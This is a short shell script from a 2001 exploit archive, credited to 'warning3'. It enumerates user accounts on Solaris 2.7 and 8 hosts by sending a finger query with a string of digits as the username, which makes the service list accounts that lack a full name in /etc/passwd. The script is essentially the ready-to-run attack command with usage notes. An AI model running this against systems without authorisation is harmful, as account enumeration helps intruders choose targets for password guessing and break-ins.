#!/bin/sh
#
# If you use digits  as username, Solaris "finger" will list
# the users who have not configured full name in /etc/passwd.
#
# Affected: solaris 2.7, solaris 8.0
#
# Usage:
#       ./fng.sh <host>
#                                         Found by warning3
echo -n "Targetting: "
finger 01234567@$1
#                www.hack.co.za           [19 April 2001]
